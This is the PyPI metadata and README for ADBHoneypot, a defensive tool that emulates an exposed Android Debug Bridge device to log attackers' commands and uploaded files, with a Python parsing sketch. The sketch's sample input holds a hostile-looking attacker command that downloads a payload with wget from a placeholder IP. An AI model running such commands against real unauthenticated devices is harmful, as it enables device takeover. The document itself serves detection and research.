Metadata-Version: 2.4
Name: adbhoneypot
Version: 3.0.2
Summary: An ADB Honeypot
Home-page: https://gitlab.com/bontchev/adbhoneypot
Author: Vesselin Bontchev
Author-email: vbontchev@yahoo.com
License: GPL-3.0-only
Classifier: Development Status :: 5 - Production/Stable
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: Science/Research
Classifier: Intended Audience :: System Administrators
Classifier: Operating System :: Microsoft :: Windows
Classifier: Operating System :: POSIX :: Linux
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.6
Classifier: Programming Language :: Python :: 3.7
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Programming Language :: Python :: 3.14
Classifier: Topic :: Security
Requires-Python: >=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: configparser>=3.5.0
Requires-Dist: geoip2>=2.7.0
Requires-Dist: ipaddress; python_version < "3"
Requires-Dist: maxminddb>=1.3.0
Requires-Dist: pytz
Requires-Dist: requests<=2.27.1; python_version < "3"
Requires-Dist: requests; python_version >= "3"
Requires-Dist: service_identity<=18.1.0; python_version < "3"
Requires-Dist: service_identity; python_version >= "3"
Requires-Dist: twisted<21,>=20.3.0; python_version < "3"
Requires-Dist: twisted>=21; python_version >= "3"
Provides-Extra: couchdb
Requires-Dist: couchdb; extra == "couchdb"
Provides-Extra: datadog
Requires-Dist: certifi; extra == "datadog"
Requires-Dist: cryptography<=2.8; python_version < "3" and extra == "datadog"
Requires-Dist: pyOpenSSL<=18.0.0; python_version < "3" and extra == "datadog"
Requires-Dist: cryptography; python_version >= "3" and extra == "datadog"
Requires-Dist: pyOpenSSL; python_version >= "3" and extra == "datadog"
Provides-Extra: discord
Requires-Dist: certifi; extra == "discord"
Provides-Extra: elastic
Requires-Dist: elasticsearch<=7.13; python_version < "3" and extra == "elastic"
Requires-Dist: numpy<=1.16.6; python_version < "3" and extra == "elastic"
Requires-Dist: elasticsearch8<9.0.0,>=8.12.0; python_version >= "3" and extra == "elastic"
Requires-Dist: numpy; python_version >= "3" and extra == "elastic"
Provides-Extra: hpfeed
Requires-Dist: Automat<20; python_version < "3" and extra == "hpfeed"
Requires-Dist: hpfeeds>=3.0.0; extra == "hpfeed"
Provides-Extra: influx2
Requires-Dist: influxdb-client; python_version >= "3" and extra == "influx2"
Provides-Extra: jsonlog
Provides-Extra: kafka
Requires-Dist: confluent-kafka<1.0; python_version < "3" and extra == "kafka"
Requires-Dist: confluent-kafka; python_version >= "3" and extra == "kafka"
Provides-Extra: localsyslog
Provides-Extra: mongodb
Requires-Dist: pymongo<=3.13.0; python_version < "3" and extra == "mongodb"
Requires-Dist: dnspython; python_version < "3" and extra == "mongodb"
Requires-Dist: pymongo; python_version >= "3" and extra == "mongodb"
Provides-Extra: mysql
Requires-Dist: PyMySQL; python_version < "3" and extra == "mysql"
Requires-Dist: mysqlclient>=1.3.12; python_version >= "3" and extra == "mysql"
Provides-Extra: nlcvapi
Requires-Dist: certifi; extra == "nlcvapi"
Requires-Dist: pyOpenSSL<=18.0.0; python_version < "3" and extra == "nlcvapi"
Requires-Dist: pyOpenSSL; python_version >= "3" and extra == "nlcvapi"
Provides-Extra: postgres
Requires-Dist: psycopg2-binary; extra == "postgres"
Provides-Extra: redisdb
Requires-Dist: redis<=3.5.3; python_version < "3" and extra == "redisdb"
Requires-Dist: redis; python_version >= "3" and extra == "redisdb"
Provides-Extra: rethinkdblog
Requires-Dist: rethinkdb>=2.4; extra == "rethinkdblog"
Requires-Dist: looseversion; extra == "rethinkdblog"
Provides-Extra: slack
Requires-Dist: slackclient<3; python_version < "3" and extra == "slack"
Requires-Dist: slack-sdk; python_version >= "3" and extra == "slack"
Provides-Extra: socketlog
Provides-Extra: sqlite
Provides-Extra: telegram
Requires-Dist: certifi; extra == "telegram"
Provides-Extra: textlog
Provides-Extra: xmpp
Requires-Dist: xmpppy>=0.7.3; extra == "xmpp"
Provides-Extra: all
Requires-Dist: Automat<20; python_version < "3" and extra == "all"
Requires-Dist: PyMySQL; python_version < "3" and extra == "all"
Requires-Dist: certifi; extra == "all"
Requires-Dist: confluent-kafka; python_version >= "3" and extra == "all"
Requires-Dist: confluent-kafka<1.0; python_version < "3" and extra == "all"
Requires-Dist: couchdb; extra == "all"
Requires-Dist: cryptography; python_version >= "3" and extra == "all"
Requires-Dist: cryptography<=2.8; python_version < "3" and extra == "all"
Requires-Dist: dnspython; python_version < "3" and extra == "all"
Requires-Dist: elasticsearch8<9.0.0,>=8.12.0; python_version >= "3" and extra == "all"
Requires-Dist: elasticsearch<=7.13; python_version < "3" and extra == "all"
Requires-Dist: hpfeeds>=3.0.0; extra == "all"
Requires-Dist: influxdb-client; python_version >= "3" and extra == "all"
Requires-Dist: looseversion; extra == "all"
Requires-Dist: mysqlclient>=1.3.12; python_version >= "3" and extra == "all"
Requires-Dist: numpy; python_version >= "3" and extra == "all"
Requires-Dist: numpy<=1.16.6; python_version < "3" and extra == "all"
Requires-Dist: psycopg2-binary; extra == "all"
Requires-Dist: pyOpenSSL; python_version >= "3" and extra == "all"
Requires-Dist: pyOpenSSL<=18.0.0; python_version < "3" and extra == "all"
Requires-Dist: pymongo; python_version >= "3" and extra == "all"
Requires-Dist: pymongo<=3.13.0; python_version < "3" and extra == "all"
Requires-Dist: redis; python_version >= "3" and extra == "all"
Requires-Dist: redis<=3.5.3; python_version < "3" and extra == "all"
Requires-Dist: rethinkdb>=2.4; extra == "all"
Requires-Dist: slack-sdk; python_version >= "3" and extra == "all"
Requires-Dist: slackclient<3; python_version < "3" and extra == "all"
Requires-Dist: xmpppy>=0.7.3; extra == "all"
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: license
Dynamic: license-file
Dynamic: provides-extra
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary

# ADBHoneypot: an Android Debug Bridge Honeypot

ADBHoneypot is a honeypot simulating an Android device accessible via the
[Android Debug Bridge](https://developer.android.com/studio/command-line/adb)
(ADB) protocol over TCP. It is a complete rewrite of the original
[ADBHoney](https://github.com/huuck/ADBHoney) project, built on the
[Twisted](https://twistedmatrix.com) event-driven networking framework.

The honeypot records all incoming ADB connections, captures shell commands
issued by attackers, and saves any files they attempt to push to the fake
device. It supports a rich set of output plugins for storing and forwarding
events to a variety of backends.

## ADB (Android Debug Bridge)

ADB (Android Debug Bridge) and its protocol are what a computer uses to
communicate with Android devices (like phones and TVs). The protocol itself is
an application layer protocol, which can run on top of TCP or USB. ADB
implements various control commands (e.g. "adb shell", "adb pull", etc.) for the
benefit of clients (like command-line users). These commands are called
'services' in ADB. ADB usually communicates with the device over USB, but it is
also possible to use ADB over Wi-Fi after some initial setup over USB. The
device can be set to listen for a TCP/IP connection on port 5555 by issuing the
command `adb tcpip 5555`. Devices that do not support authentication can be
accessed and attacked remotely, allowing the attacker to take full control of
the device by using a combination of the following commands.

For now the honeypot accepts:

* `adb connect host[:port]` - Connect to a device over TCP/IP. If you do not
  specify a port, 5555 is used by default.

* `adb disconnect [host | host:port]` - Disconnect from the specified TCP/IP
  device running on the specified port. If you do not specify a host or a port,
  then all devices are disconnected from all TCP/IP ports. If you specify a
  host, but not a port, the default port 5555 is used.

* `adb shell command` - Issue a shell command in the target device and then exit
  the remote shell.

* `adb push local_filepath remote_filepath` - Copy files and directories from the
  local device (computer) to a remote location on the device.
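
How an `adb shell command` request looks on the wire, and how a listener can recover the command for logging, is sketched below. This is an added example, not ADBHoneypot's own code; the 24-byte header layout and the `shell:` service prefix are taken from the AOSP ADB protocol description rather than from this page, and the function names and sample bytes are constructed for illustration.

```python
import re
import struct

# Assumed from the AOSP protocol notes: six little-endian uint32 header fields.
HEADER = struct.Struct("<6I")          # command, arg0, arg1, data_length, data_check, magic
CNXN, OPEN = 0x4E584E43, 0x4E45504F    # b"CNXN" and b"OPEN" read as little-endian uint32
URL_RE = re.compile(r"(?:https?|ftp)://[^\s'\";|&]+")


def build_message(command, arg0, arg1, data=b""):
    """Build one ADB message (used here only to construct the sample input)."""
    check = sum(bytearray(data)) & 0xFFFFFFFF
    return HEADER.pack(command, arg0, arg1, len(data), check, command ^ 0xFFFFFFFF) + data


def parse_stream(buf):
    """Yield (command, arg0, arg1, payload) for each complete, valid message in buf."""
    offset = 0
    while len(buf) - offset >= HEADER.size:
        command, arg0, arg1, length, check, magic = HEADER.unpack_from(buf, offset)
        if magic != command ^ 0xFFFFFFFF:
            raise ValueError("bad magic: not an ADB message")
        start = offset + HEADER.size
        if len(buf) - start < length:
            break                      # truncated payload: wait for more data
        payload = buf[start:start + length]
        # Newer clients send 0 here to skip the checksum, so only verify non-zero values.
        if check and sum(bytearray(payload)) & 0xFFFFFFFF != check:
            raise ValueError("payload checksum mismatch")
        yield command, arg0, arg1, payload
        offset = start + length


def shell_events(buf):
    """Return a list of (shell_command, [urls]) for every OPEN of a shell: service."""
    events = []
    for command, _arg0, _arg1, payload in parse_stream(buf):
        service = payload.rstrip(b"\x00").decode("utf-8", "replace")
        if command == OPEN and service.startswith("shell:"):
            cmd = service[len("shell:"):]
            events.append((cmd, URL_RE.findall(cmd)))
    return events


# Constructed sample: the messages sent by `adb connect` followed by `adb shell <command>`.
SAMPLE = (
    build_message(CNXN, 0x01000000, 4096, b"host::\x00")
    + build_message(OPEN, 1, 0, b"shell:cd /data/local/tmp; wget http://203.0.113.5/sample.bin\x00")
)
```

`shell_events(SAMPLE)` returns the shell command together with the download URL it references, which is the kind of record the honeypot's wget/curl capture feature is concerned with.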

## Features

* Full Twisted-based async I/O, scales to many simultaneous connections.
* Captures shell commands, file pushes, and wget/curl download attempts.
* Saves uploaded files to disk, named by their SHA-256 hash.
* Optionally downloads files referenced in wget/curl commands.
* Configurable fake device identity string (model, features, etc.).
* Works on Linux and Windows, with Python 2.7 and Python 3.6+.
* Rich set of output plugins.
* `adbhoneypot` CLI command for init/run/start/stop/restart/status.
* Installable from PyPI.

## Prerequisites

* Python 2.7 or Python 3.6+
* A working database server (only if you use a database output plugin)

## Usage

Check the [Linux installation guide](https://gitlab.com/bontchev/adbhoneypot/-/blob/master/adbhoneypot/data/docs/INSTALL.md) or the
[Windows installation guide](https://gitlab.com/bontchev/adbhoneypot/-/blob/master/adbhoneypot/data/docs/INSTALLWIN.md) for complete
instructions on how to install, configure, and run the honeypot.

## Links

Android Open Source Project - [ADB Overview](https://github.com/aosp-mirror/platform_system_core/blob/master/adb/OVERVIEW.TXT)

Android Developer - [ADB Documentation](https://developer.android.com/studio/command-line/adb)

Reverse-engineered documentation - [ADB Protocol](https://github.com/cstyan/adbDocumentation#adb-protocol-documentation)

Geir Sporsheim - [protocol.py](https://github.com/sporsh/twisted-adb/blob/master/adb/protocol.py)
